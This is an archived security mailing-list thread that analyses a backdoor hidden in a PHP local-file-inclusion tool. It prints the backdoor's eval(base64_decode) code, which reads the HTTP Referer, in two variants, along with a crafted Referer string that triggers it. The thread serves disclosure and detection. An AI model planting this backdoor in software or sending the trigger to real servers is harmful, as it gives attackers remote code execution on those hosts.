Full Disclosure mailing list archives
Re: Analysis of the "r00t 4 LFI Toolkit"
From: InterN0T Advisories <advisories () intern0t net>
Date: Sun, 19 Feb 2012 13:06:07 -0500
Thank you for the response, I didn't know it was included in the Weevely tool, but I did see it used in a few "priv8" PHP shells too. On Sun, 19 Feb 2012 19:32:13 +0200, Anestis Bechtsoudis <bechtsoudis.a () gmail com> wrote:
The backdoor PHP code that you included is exactly the same as generated by Weevely [1] tool, until the 0.4 version of the tool. For convenience I include the base64 decoded Weevely code here too: ini_set('error_log','/dev/null'); parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='my' && count($a)==9) {echo '<pass>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</pass>';} For more details you can refer at a relevant post I wrote recently [2]. I haven't dig into "r00t 4 LFI" source code, but from your analysis the similarities are pretty obvious. ps: This email has been BCC'ed to Weevely developer. [1] http://code.google.com/p/weevely/ [2] https://bechtsoudis.com/security/put-weevely-on-the-your-nids-radar/ On 02/19/2012 07:01 PM, InterN0T Advisories wrote:Dear Full Disclosure readers, Today I saw Joe McCray among others, tweet about the (new) "r00t 4 LFI Toolkit", that according to its description: ------------------------------------------- This tool is a php script that assists in performing local file
inclusion
attacks. -------------------------------------------Should be able to perform local file inclusion attacks.-:: Overview ::- After studying this tool for a brief 5 minutes, it was obvious that it was nowhere what I hoped it to be, as the tool only use one method, the "/proc/self/environ" vector (as seen on e.g., the intern0t forums and many other sites). The tool is therefore, not capable of performing "attacks", but only 1, single type of LFI attack. (Note that the 'S' has been removed.) The method this tool uses, is far from new and doesn't always work either, but it's a nice trick that e.g., SirGod wrote about on the intern0t forums in 2009. (This tool was released the 18th February 2012.) -:: Vulnerabilities ::- Further study of this tool reveals: - None of the output from the tool is sanitized, meaning the attacker using the script, can get XSS'd (and CSRF'd), if the target has changed e.g., the 'uname -a' command (which is relatively simple to do), to include (print) JavaScript instead. If this happens, the attacker may end up attacking himself, crashing or something third, depending on the type
of
XSS payload. - The most interesting part, is on line 92, where the "developer" (KedAns-Dz), has decided to >>backdoor<< the tool. -:: The Backdoor ::- Analysis of the backdoor: By sending a HTTP request, that includes a specially crafted referer,
it
is possible to execute PHP code: ------------------------------------------- Referer: a1=iz&a2=&a3=&a4=&a5=&a6=&a7=&a8=&a0=cGhwaW5mbygpOw== ------------------------------------------- This referer will make the script execute: phpinfo(); -:: Code Review ::- The code that enables the developer to use the script as a backdoor
looks
like the following: ------------------------------------------- parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';} ------------------------------------------- It certainly took a little bit of study to trigger, but in essence
here's
what it do: 1. Parse the HTTP Referer string into variable: $a ("Referer:" is not included.) 2. If the first array value (not key / arg), is a string named: iz 3. And if there's 9 (different) arrays, then 4. Print out the contents of.. This requires a bit more in-depth explanation: A) Evaluate the following as PHP code: B) Base64_decode the input: C) Replace " " (space) with "+" (plus), in case they occur. D) Use the last three array values from the HTTP referer. (You don't have to use all three, using the last will work fine.) To make it all a lot more simple: -------------------------------------------
Referer:Array1=iz&Array2=&Array3=&Array4=&Array5=&Array6=&Array7=&Array8=&Array0=[BASE64
Code that will be executed as PHP.] ------------------------------------------- Screenshot: http://i.imgur.com/PXcSX.png References:
http://forum.intern0t.org/offensive-guides-information/4113-analysis-r00t-4-local-file-inclusion-toolkit.html
http://forum.intern0t.org/general-hacking-discussions/1258-shell-via-local-file-inclusion-proc-self-environ-method-step-step.html
http://packetstormsecurity.org/files/109940/ https://twitter.com/#!/j0emccray/status/170941195030233090 https://twitter.com/#!/EChavarro/status/170941489629761537 http://i.imgur.com/PXcSX.png Best regards, MaXe _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Analysis of the "r00t 4 LFI Toolkit" InterN0T Advisories (Feb 19)
- Re: Analysis of the "r00t 4 LFI Toolkit" Anestis Bechtsoudis (Feb 19)
- Re: Analysis of the "r00t 4 LFI Toolkit" InterN0T Advisories (Feb 19)
- Re: Analysis of the "r00t 4 LFI Toolkit" Manu (Feb 20)
- Re: Analysis of the "r00t 4 LFI Toolkit" Gage Bystrom (Feb 20)
- Re: Analysis of the "r00t 4 LFI Toolkit" Benji (Feb 20)
- Re: Analysis of the "r00t 4 LFI Toolkit" InterN0T Advisories (Feb 19)
- Re: Analysis of the "r00t 4 LFI Toolkit" Anestis Bechtsoudis (Feb 19)